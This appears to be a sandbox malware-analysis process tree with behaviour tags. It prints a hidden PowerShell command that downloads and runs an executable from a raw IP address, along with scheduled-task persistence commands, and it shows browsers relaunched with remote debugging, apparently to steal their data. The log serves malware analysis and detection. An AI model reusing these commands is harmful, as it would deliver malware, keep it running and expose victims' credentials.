C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn kD2RPmajX26 /tr "mshta C:\Users\Admin\AppData\Local\Temp\onEpcChGT.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3184
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\onEpcChGT.hta2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Users\Admin\AppData\Local\TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE"C:\Users\Admin\AppData\Local\TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5172 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5148
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 8009⤵
- Program crash
PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"8⤵
- Executes dropped EXE
PID:3048 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- Downloads MZ/PE file
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3228 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5088 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9a0e2dcf8,0x7ff9a0e2dd04,0x7ff9a0e2dd1011⤵PID:5252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1992,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1988 /prefetch:211⤵PID:5132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2252,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1604 /prefetch:311⤵PID:4188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2388,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2488 /prefetch:811⤵PID:5004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3240 /prefetch:111⤵
- Uses browser remote debugging
PID:5432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3260 /prefetch:111⤵
- Uses browser remote debugging
PID:3952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4288 /prefetch:211⤵
- Uses browser remote debugging
PID:3764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4660 /prefetch:111⤵
- Uses browser remote debugging
PID:1660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5280,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5276 /prefetch:811⤵PID:4452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5488,i,8684886912199516445,9331960272464510036,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5500 /prefetch:811⤵PID:3648
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5600 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ff99209f208,0x7ff99209f214,0x7ff99209f22011⤵PID:5628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1952,i,17494290350861469147,14811117038562161759,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:311⤵PID:4956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2188,i,17494290350861469147,14811117038562161759,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:211⤵PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2380,i,17494290350861469147,14811117038562161759,262144 --variations-seed-version --mojo-platform-channel-handle=2652 /prefetch:811⤵PID:3768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3588,i,17494290350861469147,14811117038562161759,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:111⤵
- Uses browser remote debugging
PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3600,i,17494290350861469147,14811117038562161759,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:111⤵
- Uses browser remote debugging
PID:4060
-
-
-
C:\ProgramData\37q1nohlny.exe"C:\ProgramData\37q1nohlny.exe"10⤵
- Executes dropped EXE
PID:5224 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:1676
-
-
-
C:\ProgramData\g4790zmg47.exe"C:\ProgramData\g4790zmg47.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:7688 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9864edcf8,0x7ff9864edd04,0x7ff9864edd1013⤵PID:7704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2008,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2188 /prefetch:313⤵PID:7932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1796,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1788 /prefetch:213⤵PID:7940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2300,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2452 /prefetch:813⤵PID:8012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3204 /prefetch:113⤵
- Uses browser remote debugging
PID:8112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3252 /prefetch:113⤵
- Uses browser remote debugging
PID:8128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4228,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4252 /prefetch:213⤵
- Uses browser remote debugging
PID:6824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4524,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4568 /prefetch:113⤵
- Uses browser remote debugging
PID:1972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5068,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5084 /prefetch:813⤵PID:5436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5148,i,7388659208093363860,10399651787315511260,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5124 /prefetch:813⤵PID:6608
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
PID:10116 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch13⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:10136 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ff98307f208,0x7ff98307f214,0x7ff98307f22014⤵PID:10380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1768,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:314⤵PID:14944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2280,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:214⤵PID:14952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1976,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:814⤵PID:14976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3500,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:114⤵
- Uses browser remote debugging
PID:10596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:114⤵
- Uses browser remote debugging
PID:10608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4656,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=4660 /prefetch:814⤵PID:10912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4652,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:814⤵PID:14532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5388,i,14103490223553576699,14231459714402547980,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:814⤵PID:11396
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\IECFBKFHCA.exe"12⤵
- System Location Discovery: System Language Discovery
PID:14520 -
C:\Users\Admin\IECFBKFHCA.exe"C:\Users\Admin\IECFBKFHCA.exe"13⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7328 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:7580 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"15⤵
- Uses browser remote debugging
PID:17640 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9864edcf8,0x7ff9864edd04,0x7ff9864edd1016⤵PID:17656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2012,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=2008 /prefetch:216⤵PID:17860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2108,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:316⤵PID:17876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2288,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=2736 /prefetch:816⤵PID:17924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=3252 /prefetch:116⤵
- Uses browser remote debugging
PID:17972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=3280 /prefetch:116⤵
- Uses browser remote debugging
PID:17980
-
-
